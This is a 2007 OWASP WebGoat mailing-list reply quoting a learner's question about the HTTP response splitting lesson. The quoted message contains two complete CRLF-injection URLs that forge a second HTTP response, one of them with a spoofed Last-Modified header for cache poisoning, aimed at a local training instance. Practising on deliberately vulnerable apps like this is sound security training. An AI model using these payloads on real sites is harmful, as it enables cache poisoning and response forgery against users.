[prev in list] [next in list] [prev in thread] [next in thread]
List: owasp-webgoat
Subject: Re: [Owasp-webgoat] Help With HTTP Splitting
From: "Brian Spindel" <bspindel () runbox ! com>
Date: 2007-09-20 15:44:31
Message-ID: E1IYOCd-0005WK-DR () fenris ! runbox ! com
[Download RAW message or body]
Michael,
I got stuck in here as well, and never got unstuck. (WebGoat on Fedora 7 with \
Firefox)
-Brian
----- Start Original Message -----
Sent: Thu, 20 Sep 2007 10:32:11 -0500
From: "Michael Wisniewski" <wiz561@gmail.com>
To: owasp-webgoat@lists.owasp.org
Subject: [Owasp-webgoat] Help With HTTP Splitting
> Hi!
>
> OK, I feel stupid for asking this....but I'm having problems trying to
> exploit the second lesson. lol...
>
> I'm hoping that somebody can help me out to see what I'm doing wrong.
> I've tried WebGoat on my Mac OS with Firefox. I was having problems
> with it, so I then tried the "Damn Vulnerable Linux" disc which has
> webgoat on it. I'm using that with Konqueror, but still having
> problems. Here's what I'm doing.
>
> 1) In the URL of Konqueror, I put in...
>
> http://127.0.0.1:8080/WebGoat/attack?Screen=50&menu=50&fromRedirect=yes&language=?fo \
> o%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Put
> something in here for a test</html>
>
> 2) After that, I use...
>
> http://127.0.0.1:8080/WebGoat/attack?Screen=50&menu=50&fromRedirect=yes&language=?fo \
> o%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/ \
> html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202007%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Put
> something else in here for another test</html>
>
> 3) After you hit enter, I'm assuming that the webgoat screen will
> refresh with my "Put somethign else in here for another test" text,
> and the HTTP SPlitting will have a checkbox.
>
> Is this how you would exploit it? Is there something that I'm missing?
>
> Thank you for any help!!!!
> _______________________________________________
> Owasp-webgoat mailing list
> Owasp-webgoat@lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-webgoat
>
----- End Original Message -----
_______________________________________________
Owasp-webgoat mailing list
Owasp-webgoat@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-webgoat
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic